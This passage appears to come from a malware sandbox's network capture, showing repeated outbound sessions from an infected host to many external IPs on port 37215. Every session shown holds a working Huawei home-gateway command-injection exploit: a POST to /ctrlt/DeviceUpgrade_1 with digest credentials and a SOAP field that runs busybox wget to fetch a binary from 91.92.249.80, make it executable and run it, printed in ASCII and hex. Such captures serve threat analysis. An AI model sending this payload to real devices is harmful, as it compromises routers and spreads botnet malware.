                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1948192.168.2.2359546157.218.79.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588704109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1949192.168.2.2356738197.22.42.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588721037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1950192.168.2.2356188157.14.89.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588794947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1951192.168.2.2344050197.36.135.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588810921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1952192.168.2.233589495.50.234.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588855028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1953192.168.2.2360344157.22.21.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588862896 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1954192.168.2.235168841.247.162.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588927031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1955192.168.2.2354702157.136.82.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588933945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1956192.168.2.2336030157.13.44.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588937998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1957192.168.2.2346108157.50.68.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588990927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1958192.168.2.2349834157.161.99.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.589047909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
